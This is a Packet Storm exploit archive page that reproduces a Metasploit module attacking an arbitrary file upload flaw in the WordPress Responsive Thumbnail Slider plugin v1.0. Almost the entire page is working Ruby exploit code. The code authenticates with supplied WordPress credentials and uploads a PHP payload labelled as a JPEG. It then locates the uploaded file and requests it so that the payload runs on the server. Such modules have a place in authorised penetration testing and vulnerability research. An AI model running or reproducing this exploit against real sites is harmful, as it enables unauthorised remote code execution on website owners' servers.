what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Responsive Thumbnail Slider Arbitrary File Upload

WordPress Responsive Thumbnail Slider Arbitrary File Upload
Posted Jul 27, 2018
Authored by Arash Khazaei, Shelby Pace | Site metasploit.com

This Metasploit module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.

tags | exploit, arbitrary, file upload
SHA-256 | 8ee01269b9ed74a3a7ab070775e8793353cb3fbec90f61759ae14ae92e25bdfa

WordPress Responsive Thumbnail Slider Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE

def initialize(info={})
super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'EDB', '37998' ]
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
])
end

def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end

def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')

res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)

if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end

nil
end

def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')

res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)

if res && res.code == 200
vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
return CheckCode::Detected
end

nil
end

def login
auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies

store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)

print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
auth_cookies
end

def upload_payload(cookies)
manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
file_payload = get_write_exec_payload(:unlink_self => true)
file_name = "#{rand_text_alpha(5)}.php"

# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, manage_uri),
'cookie' => cookies
)

unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
end

data = Rex::MIME::Message.new
data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
post_data = data.to_s

# upload the file
upload_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)

page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)

retrieve_file(page, cookies)
end

def retrieve_file(res, cookies)
fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")

print_good("Successful upload")
send_request_cgi(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
)
end

def exploit
unless check == CheckCode::Safe
auth_cookies = login
upload_payload(auth_cookies)
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close